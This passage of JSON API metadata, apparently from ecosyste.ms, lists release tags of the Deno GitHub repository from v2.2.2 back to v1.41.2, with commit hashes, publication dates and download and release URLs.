/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"